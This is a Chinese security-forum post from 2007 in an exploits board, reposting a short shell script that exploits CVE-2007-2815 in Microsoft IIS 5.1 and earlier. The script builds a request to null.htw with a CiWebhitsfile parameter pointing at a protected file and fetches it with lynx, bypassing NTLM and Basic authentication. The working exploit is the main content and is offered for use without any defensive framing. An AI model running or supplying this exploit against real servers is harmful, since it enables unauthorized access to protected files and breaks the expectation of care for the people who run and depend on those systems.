Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit

ring04h

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员社区主管

帖子: 3917
精华: 128
积分: 209624
阅读权限: 200
性别: 男
在线时间: 1092 小时
注册时间: 2007-10-23
最后登录: 2008-7-6

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-6-12 01:02 只看该作者

Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit

复制内容到剪贴板

代码:

#!/bin/sh

#

# NTLM && BASIC AUTH BYPASS :)

#

# sha0[at]badchecksum.net

# Based on my adv: [url]http://www.securityfocus.com/bid/24105/info[/url]  (CVE-2007-2815)



if [ $# != 2 ]

then

    printf "USAGE:\t\t$0 <Site> <Protected Object>\nExample:\t$0 [url]http://www.microsoft.com[/url] /en/us/default.aspx\n\n";

    exit 0

fi



site=$1

protectedObject=$2

evil=$site&#39;/shao/null.htw?CiWebhitsfile=&#39;$protectedObject&#39;&CiRestriction=b&CiHiliteType=full&#39;

lynx -dump $evil

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit

Microsoft IIS &lt;= 5.1 Hit Highlighting Authentication Bypass Exploit

Microsoft IIS &lt;= 5.1 Hit Highlighting Authentication Bypass Exploit

代码:

Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit

Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit